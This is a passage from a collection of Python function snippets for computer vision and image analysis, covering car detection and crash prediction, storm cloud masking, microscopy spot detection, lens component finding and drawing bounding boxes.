axes[4].add_patch(draw_lens_circle)\n# axes[4].add_patch(draw_gal_circle)\n \n axes[4].set_title('Pixels to Mask: \\n r = {:.3f}'.format(lens_rad_arcsec))\n axes[4].text(1, 1, \"detected components\", color='red')\n axes[4].set_axis_off()\n \n if title != None:\n f.suptitle(title, fontsize = 15)\n# plt.show()\n \n \n return (x_sats, y_sats), (new_center_x, new_center_y), sources", "def drawCars(self):\n for car in self.cars:\n if car.aliveForFrames >= ALIVE_THRESHOLD:\n msg = 'ID: {0:>2}\\n'.format(car.id)\n msg += 'conf:{0:.2f}%\\n'.format(car.displayedConfidence * 100)\n msg += 'active: {} frames'.format(car.aliveForFrames - 
car.aliveForFrames % 5)\n self.car_detector.draw_boxes(self.image, tuple(car.box), msg)\n\n return self.image", "def process_tir_image(ds, data_res, t_thresh=-50, min_mcs_size=5000):\n ctt = (ds['tb']).squeeze()-273.15\n min_pix_nb = min_mcs_size / data_res**2\n\n max_pix_nb = 300000 / data_res**2 # this is to capture satellite artefacts that come in large contiguous stripes.\n labels, goodinds = mcs_define(ctt.values, t_thresh, minmax_area=[min_pix_nb, max_pix_nb]) # 7.7x7.7km = 64km2 per pix in gridsat? 83 pix is 5000km2\n dic = dictionary()\n #plt.figure()\n #plt.pcolormesh(labels)\n #plt.colorbar()\n #plt.show()\n for g in goodinds:\n\n if g==0:\n continue\n\n pos = np.where(labels==g)\n npos = np.where(labels!=g)\n datestr = str(int(ctt['time.year'].values))+'-'+str(int(ctt['time.month'].values)).zfill(2)+'-'+str(int(ctt['time.day'].values)).zfill(2)+'_'+\\\n str(int(ctt['time.hour'].values)).zfill(2)+':'+str(int(ctt['time.minute'].values)).zfill(2)\n \n dic['date'].append(datestr)\n dic['month'].append(int(ctt['time.month']))\n dic['hour'].append(int(ctt['time.hour']))\n dic['year'].append(int(ctt['time.year']))\n dic['day'].append(int(ctt['time.day']))\n dic['minute'].append(int(ctt['time.minute']))\n\n storm = ctt.copy()\n storm.values[npos] = np.nan\n tmin_pos = np.nanargmin(storm.values)\n tpos_2d = np.unravel_index(tmin_pos, storm.shape)\n \n latmin = np.nanmin(ctt.lat.values[pos[0]])\n latmax = np.nanmax(ctt.lat.values[pos[0]])\n lonmin = np.nanmin(ctt.lon.values[pos[1]])\n lonmax = np.nanmax(ctt.lon.values[pos[1]])\n dic['area'].append(np.sum(np.isfinite(storm.values))*data_res**2)\n dic['70area'].append(np.sum(storm.values<=-70)*data_res**2)\n dic['minlon'].append(lonmin)\n dic['minlat'].append(latmin)\n dic['maxlon'].append(lonmax)\n dic['maxlat'].append(latmax)\n dic['clon'].append(lonmin + (lonmax - lonmin)/2)\n dic['clat'].append(latmin + (latmax - latmin)/2)\n dic['tmin'].append(np.nanmin(storm))\n dic['tminlat'].append(float(ctt.lat[tpos_2d[0]].values))\n dic['tminlon'].append(float(ctt.lon[tpos_2d[1]].values))\n dic['tmean'].append(float(np.nanmean(storm)))\n dic['tp1'].append(float(np.nanpercentile(storm, 1)))\n dic['tp99'].append(float(np.nanpercentile(storm, 99)))\n dic['stormID'].append(datestr + '_' + str(g))\n dic['cloudMask'].append(labels==g)\n dic['tir'].append(storm.values)\n\n # for k in dic.keys():\n # print(k, len(dic[k]))\n return dic", "def detect_crashes(images, carpoints, centered):\n images = images.copy()\n updated_car_points = [[] for i in range(len(centered))]\n crash_frames = []\n color = (0, 0, 255)\n\n for i in range(len(centered)):\n curr_points = centered[i]\n print('i value: ' + str(i))\n if i in [0, 1]:\n for j in range(len(curr_points)):\n curr_x, curr_y = curr_points[j]\n updated_car_points[i].append((curr_x, curr_y, 0))\n else:\n for j in range(len(curr_points)):\n ''' Include case where new car point is not close to any of the other car points. Like taking care of\n adding new points. 
'''\n curr_x, curr_y = curr_points[j]\n min_ind, min_dist = find_closest((curr_x, curr_y), updated_car_points[i - 2])\n print('Min Dist, Min Index: %f, %i' % (min_dist, min_ind))\n prev_x, prev_y, old_mag = updated_car_points[i - 2][min_ind]\n\n # Now compare with prev\n\n new_mag = math.sqrt((curr_x - prev_x) ** 2 + (curr_y - prev_y) ** 2)\n print('Old: %f -- New: %f' % (old_mag, new_mag))\n\n '''curr_image = images[i]\n x1, y1, x2, y2 = car_points[i][j]\n text = \"{:.4f}; {:.4f}; {:.4f}\".format(old_mag, new_mag, min_dist)\n cv2.putText(curr_image, text, (x1, y1 - 20), cv2.FONT_HERSHEY_SIMPLEX,\n 0.41, color, 1)\n images[i] = curr_image'''\n\n if old_mag != 0 and abs(old_mag - new_mag) > 75:\n crash_frames.append(i)\n curr_image = images[i]\n width = curr_image.shape[1]\n height = curr_image.shape[0]\n x1, y1, x2, y2 = carpoints[i][j]\n cv2.rectangle(curr_image, (x1, y1), (x2, y2), color, 2)\n images[i] = curr_image\n # print(\"CRASH at frame %d\" % (i))\n\n updated_car_points[i][min_ind] = (curr_x, curr_y, new_mag)\n\n if i == len(centered) - 1:\n continue\n\n updated_car_points[i + 1] = [0 for k in range(max(len(updated_car_points[i]), len(centered[i + 1])))]\n return crash_frames, images", "def show_performance(model):\n val_image_ids_ = [i for i in val_image_ids]\n np.random.shuffle(val_image_ids_)\n\n df_val = area_filter(val_image_ids_, val_coco)\n image_id = df_val['image_id'].iloc[0]\n annotation_ids = df_val[df_val['image_id'] == image_id]['annotation_id'].tolist()\n\n image_json = val_coco.loadImgs([image_id])[0]\n raw_image = cv2.imread(os.path.join(\"{}/{}/{}\".format(data_dir, val_type, image_json['file_name'])))\n height, width, _ = raw_image.shape\n\n # decode the mask, using annotation id created at the group by above\n binary_mask = process_mask(val_coco, annotation_ids, width, height)\n\n # preprocess input and mask (resize to 128, scale to [0, 1))\n input_image, input_mask = preprocess(raw_image, binary_mask)\n\n input_mask = np.expand_dims(input_mask, axis=-1)\n predicted_mask = model.predict(np.array([input_image]))[0]\n\n plt.figure(figsize=(20, 20))\n\n title = ['Input Image', 'True Mask', 'Predicted Mask']\n display_list = [input_image[:, :, ::-1], input_mask, predicted_mask]\n for i in range(len(display_list)):\n plt.subplot(1, len(display_list), i+1)\n plt.title(title[i])\n plt.imshow(array_to_img(display_list[i]))\n plt.axis('off')\n plt.show()", "def pipeline(image):\n # undistort image\n undistorted_image = undistort_image(image)\n superimposed_image = find_lanes(undistorted_image)\n labels = find_vehicles(undistorted_image)\n\n draw_img = draw_labeled_bboxes(superimposed_image, labels)\n\n \n return draw_img", "def detect(image):\n markers = []\n # Stage 1: Detect edges in image\n gray = cvtColor(image, COLOR_BGR2GRAY)\n clahe = createCLAHE(clipLimit=1, tileGridSize=(6, 6))\n cl1 = clahe.apply(gray)\n _, thresh = threshold(cl1, 60, 255, THRESH_OTSU)\n blurred = GaussianBlur(thresh, (5, 5), 0)\n edges = Canny(blurred, 75, 100)\n\n # Stage 2: Find contours\n contours = findContours(edges, RETR_TREE, CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=contourArea, reverse=True)[:]\n\n for contour in contours:\n # Stage 3: Shape check\n perimeter = arcLength(contour, True)\n approx = approxPolyDP(contour, 0.01*perimeter, True)\n\n if len(approx) == QUADRILATERAL_POINTS:\n area = contourArea(approx)\n # (x, y, w, h) = boundingRect(approx)\n # ar = float(h) / float(w)\n # if area > 100 and ar >= 0.8 and ar <= 1.2:\n if area > 700:\n # putText(image, str(area), 
(10, 30), FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n drawContours(image, [contour], -1, (0, 255, 0), 1)\n\n # Stage 4: Perspective warping\n topdown_quad = get_topdown_quad(thresh, approx.reshape(4, 2))\n\n # Stage 5: Border check\n if topdown_quad[int((topdown_quad.shape[0]/100.0)*5), int((topdown_quad.shape[1]/100.0)*5)] > BLACK_THRESHOLD:\n continue\n\n # Stage 6: Get marker pattern\n marker_pattern = None\n\n try:\n marker_pattern = get_marker_pattern(topdown_quad, THRESHOLD_PERCENT)\n except:\n continue\n\n if not marker_pattern:\n continue\n\n # Stage 7: Match marker pattern\n marker_found, marker_rotation, marker_name = match_marker_pattern(marker_pattern)\n\n if marker_found:\n markers.append([marker_name, marker_rotation])\n\n return markers, image", "def test():\n import os\n import ClearMap.ImageProcessing.SpotDetection as self\n reload(self)\n import ClearMap.IO as io \n import ClearMap.Settings as settings\n \n basedir = settings.ClearMapPath;\n #fn = '/home/ckirst/Science/Projects/BrainActivityMap/Data/iDISCO_2015_06/Adult cfos C row 20HF 150524.ims';\n fn = os.path.join(basedir, 'Test/Data/Synthetic/label_iDISCO_\\d{3}.tif');\n fn = os.path.join(basedir, 'Test/Data/OME/16-17-27_0_8X-s3-20HF_UltraII_C00_xyz-Table Z\\d{4}.ome.tif');\n #fn = '/run/media/ckirst/ChristophsBackuk4TB/iDISCO_2015_06/Adult cfos C row 20HF 150524.ims';\n #fn = '/home/nicolas/Windows/Nico/cfosRegistrations/Adult cfos C row 20HF 150524 - Copy.ims';\n #fn = '/home/ckirst/Science/Projects/BrainActivityMap/iDISCO_2015_04/test for spots added spot.ims'\n\n img = io.readData(fn);\n #img = dataset[0:500,0:500,1000:1008];\n #img = dataset[600:1000,1600:1800,800:830];\n #img = dataset[500:1500,500:1500,800:809]; \n img = img.astype('int16');\n \n #m = sys.modules['iDISCO.ImageProcessing.SpotDetection']\n #c = self.detectCells(img);\n \n c = self.detectCells(img, dogSize = None, cellShapeThreshold = 1, cellShapeFile = '/home/ckirst/Science/Projects/BrainActivityMap/Analysis/iDISCO/Test/Data/CellShape/cellshape_\\d{3}.tif');\n \n print ('done, found %d cells !' 
% c[0].shape[0])\n\n\n #test intensities:\n import numpy;\n x = numpy.random.rand(30,30,10);\n centers = numpy.array([[0,0,0], [29,29,9]]);\n i = self.findIntensity(x, centers, boxSize = (1,1,1));\n print (i)", "def detect_cars_multi_area(img,\n clf,\n xy_window=(64, 64),\n stride=None,\n y_start_stops=None,\n image_size_factors=[1],\n x_padding=None,\n heatmap=False,\n n_jobs=1):\n\n if n_jobs < 0:\n n_jobs = multiprocessing.cpu_count()\n\n if stride is None:\n stride = np.repeat([[xy_window[0], xy_window[1]]], len(image_size_factors), axis=0)\n\n if y_start_stops is None:\n y_start_stops = np.repeat([[0, img.shape[0] - 1]], len(image_size_factors), axis=0)\n\n if x_padding is None:\n x_padding = np.repeat([0], len(image_size_factors), axis=0)\n\n # use joblib to run processing in parallel\n result = Parallel(n_jobs=n_jobs)(\n delayed(detect_cars)(\n img,\n clf,\n xy_window,\n cur_stride,\n cur_sizes_factors,\n cur_y_start_stop,\n cur_x_padding)\n for cur_stride, cur_sizes_factors, cur_y_start_stop, cur_x_padding in\n zip(stride, image_size_factors, y_start_stops, x_padding))\n\n bounding_boxes, des_func = zip(*result)\n bounding_boxes = np.vstack(bounding_boxes)\n\n des_func = np.concatenate(des_func)\n\n if heatmap:\n heat = np.zeros(img.shape[:2], dtype=np.float32)\n for bb, df in zip(bounding_boxes, des_func):\n heat[bb[1]:bb[3], bb[0]:bb[2]] += df\n\n return heat\n\n return bounding_boxes", "def vis_detections(im, class_name, dets, thresh=0.8):\n\n dict = {'HolderA': 'Holder', 'WheelA': 'WheelA', 'WheelB': 'WheelB', 'BrakeA': 'Brake', 'SpringA': 'Spring',\n 'BuckleA': 'BuckleA', 'BuckleB': 'BuckleB', 'TubeA': 'Tube', 'NutA': 'NutA', 'ScrewA': 'ScrewA',\n 'NutB': 'NutB', 'ScrewB': 'ScrewB',\n 'WireA': 'Wire', 'PlateA': 'PlateA', 'PlateB': 'PlateB', 'PlateD': 'PlateC', 'PlateE': 'PlateD',\n 'BoltA': 'Bolt', 'LoopB': 'Loop', 'JointA': 'JointA', 'JointB': 'JointB', 'FixatorA': 'Fixator',\n 'BearingA': 'Bearing', 'PlugA': 'Plug'}\n\n for i in range(np.minimum(10, dets.shape[0])):\n bbox = tuple(int(np.round(x)) for x in dets[i, :4])\n score = dets[i, -1]\n if score > thresh:\n # Color site: http://www.wahart.com.hk/rgb.htm\n if class_name == 'HolderA':\n color = (255, 255, 0) # Cyan\n elif class_name == 'WheelA':\n color = (212, 255, 127) # Aquamarina\n elif class_name == 'WheelB':\n color = (99, 99, 238) # IndianRed2\n elif class_name == 'BrakeA':\n color = (99, 99, 238) # IndianRed2\n elif class_name == 'SpringA':\n color = (180, 130, 70) # SteelBlue\n elif class_name == 'BuckleA':\n color = (205, 0, 0) # MediumBlue\n elif class_name == 'BuckleB':\n color = (170, 205, 102) # MediumAquamarine\n elif class_name == 'BuckleC':\n color = (0, 252, 124) # LawnGreen\n elif class_name == 'BuckleD':\n color = (50, 205, 50) # LimeGreen\n elif class_name == 'TubeA':\n color = (147, 112, 219) # PaleVioletRed\n elif class_name == 'ScrewA':\n color = (240, 32, 160) # Purple\n elif class_name == 'ScrewB':\n color = (0, 165, 255) # Orange1\n elif class_name == 'ScrewC':\n color = (48, 48, 255) # Firebrick1\n elif class_name == 'NutA':\n color = (0, 255, 255) # Yellow\n elif class_name == 'NutB':\n color = (255, 144, 30) # DodgerBlue\n elif class_name == 'NutC':\n color = (180, 238, 180) # DarkSeaGreen2\n elif class_name == 'WireA':\n color = (255, 255, 255) # White\n elif class_name == 'PlateA':\n color = (0, 69, 255) # OrangeRed\n elif class_name == 'PlateB':\n color = (102, 205, 0) # SpringGreen3\n elif class_name == 'PlateD':\n color = (0, 255, 0) # Green\n elif class_name == 'PlateE':\n color = (0, 
140, 250) # DarkOrange\n elif class_name == 'BoltA':\n color = (255, 255, 0) # Cyan\n elif class_name == 'LoopB':\n color = (180, 105, 255) # HotPink\n elif class_name == 'JointA':\n color = (105, 140, 255) # Salmon1\n elif class_name == 'JointB':\n color = (255, 0, 255) # Magenta3\n elif class_name == 'FixatorA':\n color = (0, 205, 102) # Chartreuse3\n elif class_name == 'BearingA':\n color = (185, 218, 255) # PeachPuff\n elif class_name == 'PlugA':\n color = (193, 193, 255) # RosyBrown1\n else:\n color = (139, 0, 139) # DarkMagenta\n cv2.rectangle(im, bbox[0:2], bbox[2:4], color, 2)\n # cv2.putText(im, '%s: %.3f' % (class_name, score), (bbox[0], bbox[1] + 15), cv2.FONT_HERSHEY_COMPLEX,\n # 0.5, color, thickness=1)\n cv2.putText(im, '%s: %.3f' % (dict[class_name], score), (bbox[0], bbox[1] + 15), cv2.FONT_HERSHEY_COMPLEX,\n 0.5, color, thickness=1)\n return im", "def analyze(self):\n try:\n self.options[self.multi_image][1]()\n except:\n raise Exception(\"Multi Image Option not defined.\")\n\n self.image = self.data / self.exposure\n\n background = self.min_val = np.min(self.image[:511,:511])\n self.max_val = np.max(self.image[:511,:511])\n # stats.mode returns modal value = value that occours most often\n #background = stats.mode(im[:50,:50].ravel())[0][0]\n\n intensity = self.image.sum() - background*np.size(self.image)\n\n #results.append((self.index, intensity, background))\n self.index =+ 1", "def predict_crashes_with_tracking(images, car_points, centered, depths, depth_differential=15, distance_differential=50,\n look_ahead=10):\n images = images.copy()\n lh = look_ahead\n\n # plot 5 frames forward\n # check size of the cars to indicate depth\n\n color = (0, 255, 255)\n wh = [(x[2] - x[0], x[3] - x[1]) for x in car_points[0]]\n for i in range(len(centered)):\n look_ahead = [[(0, 0) for i in range(len(centered[i]))] for j in range(lh + 1)]\n\n if i == 0:\n continue\n\n dxs = [0 for i in range(len(centered[i]))]\n dys = [0 for i in range(len(centered[i]))]\n\n for j in range(len(centered[i])):\n dxs[j] = centered[i][j][0] - centered[i - 1][j][0]\n dys[j] = centered[i][j][1] - centered[i - 1][j][1]\n\n look_ahead[0] = centered[i]\n for j in range(1, lh + 1):\n for k in range(len(centered[i])):\n xc = look_ahead[j - 1][k][0] + dxs[k]\n yc = look_ahead[j - 1][k][1] + dys[k]\n look_ahead[j][k] = (xc, yc)\n\n for j in range(1, lh + 1):\n for k in range(0, len(look_ahead[j]) - 1):\n for l in range(k + 1, len(look_ahead[j])):\n x1, y1 = look_ahead[j][k]\n x2, y2 = look_ahead[j][l]\n dist = math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n if dist < (images[0].shape[0] / 18) * ((distance_differential + 50) / 100) and abs(\n math.sqrt(depths[min(i + lh, len(car_points) - 1)][k]) - math.sqrt(\n depths[min(i + lh, len(car_points) - 1)][\n l])) < depth_differential / 100: # max(depths[min(i+lh, len(car_points)-1)][\n # k]/depths[min(i+lh, len(car_points)-1)][l], depths[min(i+lh, len(car_points)-1)][l]/depths[\n # min(i+lh, len(car_points)-1)][k]) - 1 < 0.1:#9.5:#0.30: #this is the pixel number which I\n # use for the threshold\n curr_image = images[i]\n a1, a2, b1, b2 = car_points[i][k]\n c1, c2, d1, d2 = car_points[i][l]\n cv2.rectangle(curr_image, (a1, a2), (b1, b2), (0, 0, 255), 5)\n cv2.rectangle(curr_image, (c1, c2), (d1, d2), (0, 0, 255), 5)\n images[i] = curr_image\n return images", "def updateFrame(self, image):\n self.currentFrame += 1\n self.image = image.copy()\n\n detected = self.car_detector.detectCars(image)\n picks = self.car_detector.non_max_suppression_fast(detected, 0.2)\n\n 
self.logger.debug(\" CURRENT CAR LIST\\n\")\n self.printCars()\n\n self.logger.debug(\"\\nNew Picks {0!s}\\n\".format(picks))\n\n self.addCars(picks)\n self.removeOldCars()\n if len(self.cars) == 0:\n self.logger.debug(\"EMPTY.... HELP\")\n # self.printCars()\n return self.drawCars()", "def get_images_and_labels_nc():\n refs = get_ref_df()\n images = {}\n for _, data in refs.iterrows():\n if data['ProbeFileName'] in images:\n continue\n im = data['ProbeFileName']\n images[im] = 1 if data['IsTarget'] == 'Y' else 0\n return images", "def detectSpots(img, detectSpotsParameter = None, correctIlluminationParameter = None, removeBackgroundParameter = None,\n filterDoGParameter = None, findExtendedMaximaParameter = None, detectCellShapeParameter = None,\n verbose = False, out = sys.stdout, **parameter):\n\n timer = Timer();\n \n # normalize data -> to check\n #img = img.astype('float');\n #dmax = 0.075 * 65535;\n #ids = img > dmax;\n #img[ids] = dmax;\n #img /= dmax; \n #out.write(timer.elapsedTime(head = 'Normalization'));\n #img = dataset[600:1000,1600:1800,800:830];\n #img = dataset[600:1000,:,800:830];\n \n # correct illumination\n correctIlluminationParameter = getParameter(detectSpotsParameter, \"correctIlluminationParameter\", correctIlluminationParameter);\n img1 = img.copy();\n img1 = correctIllumination(img1, correctIlluminationParameter = correctIlluminationParameter, verbose = verbose, out = out, **parameter) \n\n # background subtraction in each slice\n #img2 = img.copy();\n removeBackgroundParameter = getParameter(detectSpotsParameter, \"removeBackgroundParameter\", removeBackgroundParameter);\n img2 = removeBackground(img1, removeBackgroundParameter = removeBackgroundParameter, verbose = verbose, out = out, **parameter) \n \n # mask\n #timer.reset();\n #if mask == None: #explicit mask\n # mask = img > 0.01;\n # mask = binary_opening(mask, self.structureELement('Disk', (3,3,3)));\n #img[img < 0.01] = 0; # masking in place # extended maxima\n #out.write(timer.elapsedTime(head = 'Mask')); \n \n #DoG filter\n filterDoGParameter = getParameter(detectSpotsParameter, \"filterDoGParameter\", filterDoGParameter);\n dogSize = getParameter(filterDoGParameter, \"size\", None);\n #img3 = img2.copy(); \n img3 = filterDoG(img2, filterDoGParameter = filterDoGParameter, verbose = verbose, out = out, **parameter);\n \n # normalize \n # imax = img.max();\n # if imax == 0:\n # imax = 1;\n # img /= imax;\n \n # extended maxima\n findExtendedMaximaParameter = getParameter(detectSpotsParameter, \"findExtendedMaximaParameter\", findExtendedMaximaParameter);\n hMax = getParameter(findExtendedMaximaParameter, \"hMax\", None);\n imgmax = findExtendedMaxima(img3, findExtendedMaximaParameter = findExtendedMaximaParameter, verbose = verbose, out = out, **parameter);\n \n #center of maxima\n if not hMax is None:\n centers = findCenterOfMaxima(img, imgmax, verbose = verbose, out = out, **parameter);\n else:\n centers = findPixelCoordinates(imgmax, verbose = verbose, out = out, **parameter);\n \n #cell size detection\n detectCellShapeParameter = getParameter(detectSpotsParameter, \"detectCellShapeParameter\", detectCellShapeParameter);\n cellShapeThreshold = getParameter(detectCellShapeParameter, \"threshold\", None);\n if not cellShapeThreshold is None:\n \n # cell shape via watershed\n imgshape = detectCellShape(img2, centers, detectCellShapeParameter = detectCellShapeParameter, verbose = verbose, out = out, **parameter);\n \n #size of cells \n csize = findCellSize(imgshape, maxLabel = centers.shape[0], out = 
out, **parameter);\n \n #intensity of cells\n cintensity = findCellIntensity(img, imgshape, maxLabel = centers.shape[0], verbose = verbose, out = out, **parameter);\n\n #intensity of cells in background image\n cintensity2 = findCellIntensity(img2, imgshape, maxLabel = centers.shape[0], verbose = verbose, out = out, **parameter);\n \n #intensity of cells in dog filtered image\n if dogSize is None:\n cintensity3 = cintensity2;\n else:\n cintensity3 = findCellIntensity(img3, imgshape, maxLabel = centers.shape[0], verbose = verbose, out = out, **parameter);\n \n if verbose:\n out.write(timer.elapsedTime(head = 'Spot Detection') + '\\n');\n \n #remove cell;s of size 0\n idz = csize > 0;\n \n return ( centers[idz], numpy.vstack((cintensity[idz], cintensity3[idz], cintensity2[idz], csize[idz])).transpose()); \n \n \n else:\n #intensity of cells\n cintensity = findIntensity(img, centers, verbose = verbose, out = out, **parameter);\n\n #intensity of cells in background image\n cintensity2 = findIntensity(img2, centers, verbose = verbose, out = out, **parameter);\n \n #intensity of cells in dog filtered image\n if dogSize is None:\n cintensity3 = cintensity2;\n else:\n cintensity3 = findIntensity(img3, centers, verbose = verbose, out = out, **parameter);\n\n if verbose:\n out.write(timer.elapsedTime(head = 'Spot Detection') + '\\n');\n \n return ( centers, numpy.vstack((cintensity, cintensity3, cintensity2)).transpose());", "def draw_info(self, img, age_threshold=8):\n self.n_vehicles = 0\n for detection in self.detections:\n if len(detection.last_boxes) > age_threshold:\n self.n_vehicles += 1\n img = detection.draw(img, thick=2, color=(255, 50, 0))\n\n cv2.putText(img, 'Vehicles in sight: %s' % self.n_vehicles, (50, 150), cv2.FONT_HERSHEY_SIMPLEX, 1,\n (255, 255, 255), 2)\n\n return img", "def traffic_light_detection(img_in, radii_range):\n\n thresh1 = 110\n thresh2 = 60\n cannyEdges = cv2.Canny(img_in, thresh1, thresh2)\n\n circles = cv2.HoughCircles(cannyEdges,cv2.HOUGH_GRADIENT, 1, 20, param1=50,param2=30,minRadius=0,maxRadius=0)\n circles_selected = select_three(circles)\n\n for circle in circles_selected:\n column = circle[0]\n row = circle[1]\n coordinates = (column, row)\n state_pixels = img_in[int(row), int(column), :]\n # print(state_pixels)\n if state_pixels[1] == 255 and state_pixels[2] != 255 :\n state = 'green'\n if state_pixels[1] != 255 and state_pixels[2] == 255 :\n state = 'red'\n if state_pixels[1] == 255 and state_pixels[2] == 255 :\n state = 'yellow'\n\n column_2 = circles_selected[1][0]\n row_2 = circles_selected[1][1]\n coordinates_2 = (column_2, row_2)\n state_pixels_2 = img_in[int(row_2), int(column_2), :]\n\n return coordinates_2, state\n raise NotImplementedError", "def find_components_old(image,deltaPix,lens_rad_arcsec = 5.0,lens_rad_ratio = None, gal_rad_ratio = 0.1,min_size_arcsec=0.3,thresh=0.4, show_locations=False):\n\n # convert minimum component size in pixel units\n min_size = int(min_size_arcsec / deltaPix)\n \n #Convert lens radius and central galaxy radius to pixels\n if lens_rad_ratio == None:\n lens_rad = int(lens_rad_arcsec / deltaPix)\n else: lens_rad = int(len(image) * lens_rad_ratio)\n gal_rad = int(len(image) * gal_rad_ratio)\n \n # downscale source image to data resolution (for speed + easier for converting to data units)\n #down = image_util.re_size(image, factor=supersampling_factor_source)\n \n # apply laplacian of gaussian (LoG) filter to enhance maxima\n filtered = - gaussian_laplace(deepcopy(image), sigma = min_size, mode='constant', cval=0.)\n 
\n# print(filtered.min(),filtered.max(),filtered.min() + thresh * np.abs(filtered.min()))\n \n \n # assume all value below max*threshold can not be maxima, so put all to zero\n# filtered[filtered < thresh*filtered.max()] = 0.\n \n# assume all value below min*threshold can not be maxima, so put all to zero\n filtered[filtered < filtered.min() + thresh * np.abs(filtered.min())] = 0.\n \n if show_locations:\n plt.figure(figsize = (8,8))\n plt.subplot(1,2,1)\n plt.imshow(image, origin='lower', norm=SymLogNorm(5))\n plt.title('Image')\n\n plt.subplot(1,2,2)\n plt.imshow(filtered, origin='lower', norm=SymLogNorm(5))\n plt.title('Filtered Image')\n plt.show()\n \n # find coordinates of local maxima\n #print(int(0.5 * min_size))\n max_idx_2d_small = peak_local_max(filtered, min_distance=0)\n max_idx_2d_large = peak_local_max(filtered, min_distance=1)\n \n x_list_small, y_list_small = max_idx_2d_small[:, 1], max_idx_2d_small[:, 0]\n x_list_large, y_list_large = max_idx_2d_large[:, 1], max_idx_2d_large[:, 0]\n \n im_center_x, im_center_y = len(image) / 2., len(image) / 2.\n \n R = np.sqrt((x_list_large - im_center_x)**2 + (y_list_large - im_center_y)**2)\n new_center_x, new_center_y = x_list_large[R < gal_rad], y_list_large[R < gal_rad]\n \n if (len(new_center_x) > 1) and (len(x_list_large[R == R.min()]) ==1 ): \n new_center_x, new_center_y = x_list_large[R == R.min()], y_list_large[R == R.min()]\n elif (len(new_center_x) > 1) and (len(x_list_large[R == R.min()]) > 1 ): \n new_center_x, new_center_y = im_center_x, im_center_y\n elif len(new_center_x) == 0: \n new_center_x, new_center_y = im_center_x, im_center_y\n \n \n R_small = np.sqrt((x_list_small - new_center_x)**2 + (y_list_small - new_center_y)**2)\n R_large = np.sqrt((x_list_large - new_center_x)**2 + (y_list_large - new_center_y)**2)\n \n x_sats, y_sats = x_list_small[R_small > lens_rad], y_list_small[R_small > lens_rad]\n \n # show maxima on image for debug\n if show_locations:\n fig = plt.figure(figsize=(4, 4))\n #plt.imshow(image, origin='lower', cmap=cmap_flux, norm=LogNorm(1e-2))\n plt.imshow(image, origin='lower', norm=SymLogNorm(5))\n \n for i in range(len(x_sats)):\n plt.scatter([x_sats[i]], [y_sats[i]], c='red', s=60, marker='+')\n# plt.annotate(i+1, (x_list[i], y_list[i]), color='black')\n \n# for i in range(len(x_mask)):\n# plt.scatter([x_mask[i]], [y_mask[i]], c='red', s=100, marker='*')\n# plt.annotate(i+1, (x_mask[i], y_mask[i]), color='red')\n plt.scatter(new_center_x, new_center_y,c='red', s=100, marker='*')\n \n draw_lens_circle = Circle((new_center_x, new_center_y),lens_rad ,fill=False)\n draw_gal_circle = Circle((new_center_x, new_center_y),gal_rad, fill = False)\n plt.gcf().gca().add_artist(draw_lens_circle)\n plt.gcf().gca().add_artist(draw_gal_circle)\n plt.title('Detected Components')\n plt.text(1, 1, \"detected components\", color='red')\n fig.axes[0].get_xaxis().set_visible(True); fig.axes[0].get_yaxis().set_visible(True)\n plt.show()\n return (x_sats, y_sats), (new_center_x, new_center_y)", "def identify_image(im):\n score_cures = np.mean(im[1025:1065, 1130:1180, 0])\n score_ingredients = np.mean(im[1025:1065, 675:720, 0])\n if score_cures < 177.5:\n return 'cures'\n if score_ingredients < 177.5:\n return 'ingredients'\n else:\n return 'other'", "def config_hog_search(self, img):\n img = img.astype(np.float32)/255 # scale image: (png: 0-1, jpg: 0-255)\n img_crop = img[self.ys[0]:self.ys[1], :, :] # crop img to relative dimensions (ROI)\n clr_trf = cvf.transform_colorspace(img_crop, self.color_space) # transform 
color space from RGB\n clr_trf = cvu.scale_image(clr_trf, self.scale) # scale rather than selecting diffferent window sizes\n ch1, ch2, ch3 = [clr_trf[:,:,ch] for ch in range(3)] # HOG operates on per channel basis\n\n # get hog features as multi-dimensional array per channel for the entire image\n params={'orient':self.orient, 'pix_per_cell':self.pix_per_cell, 'cells_per_block':self.cells_per_block}\n params.update({'vis':False, 'feature_vec':False})\n hog1,hog2,hog3 = [cvf.get_hog_features(ch, **params) for ch in ([ch1,ch2,ch3])]\n # block configurations\n self.nfeat_per_block = self.orient*self.cells_per_block**2\n self.nblocks_per_window = (self.window //self.pix_per_cell) -1\n # number_blocks: define number of hog cells across an image according to channel dimensions\n # number_steps: define number of steps to occur across hog array to extract features\n rows, cols = ch1.shape[:2]\n number_blocks = lambda max_dim, pix_per_cell: (max_dim // pix_per_cell) -1\n number_steps = lambda nblocks, nblocks_window, cells_step: (nblocks - nblocks_window)//cells_step\n self.nxblocks, self.nyblocks = number_blocks(cols, self.pix_per_cell), number_blocks(rows, self.pix_per_cell)\n nxsteps, nysteps = \\\n [number_steps(it, self.nblocks_per_window, self.cells_per_step) for it in (self.nxblocks, self.nyblocks) ]\n return clr_trf, (nxsteps, nysteps), (hog1,hog2,hog3)", "def vis_detections(color_image, depth_colormap, class_col, dets_col, thresh=0.5):\n\n for cls_ind, class_name in enumerate(class_col):\n dets = dets_col[cls_ind]\n\n inds = np.where(dets[:, -1] >= thresh)[0]\n if len(inds) == 0:\n continue\n\n for i in inds:\n bbox = [int(e) for e in dets[i, :4]]\n score = dets[i, -1]\n \n cv2.rectangle(color_image, (bbox[0], bbox[1]),\n (bbox[2], bbox[3]), (0, 0, 255), 3)\n cv2.rectangle(depth_colormap, (bbox[0], bbox[1]),\n (bbox[2], bbox[3]), (0, 0, 255), 3)\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n color_image = cv2.putText(color_image, '{:s} {:.3f}'.format(class_name, score),\n (bbox[0], max(bbox[1] - 2, 1)), font, 0.5, (255, 255, 255), 2)\n depth_colormap = cv2.putText(depth_colormap, '{:s} {:.3f}'.format(class_name, score),\n (bbox[0], max(bbox[1] - 2, 1)), font, 0.5, (255, 255, 255), 2)\n \n # Stack both images horizontally\n images = np.hstack((color_image, depth_colormap))\n\n # Show images\n cv2.imshow('RealSense', images)", "def get_all_trends(self, verbose=False):\n self.labels = []\n inferred_lines = []\n \n # crop, resize, color quantize\n self.crop_to_gridline()\n self.crop_title()\n self.set_size()\n self.color_quantization()\n \n if verbose:\n print(\"Original Image\")\n display(self.orig_image)\n print(\"Cropped and color quantized:\")\n self.display()\n \n # separate colors into color pixel, images, and pixels that belong to it\n img_and_pix = self.separate_colors()\n colors, images, pixels = 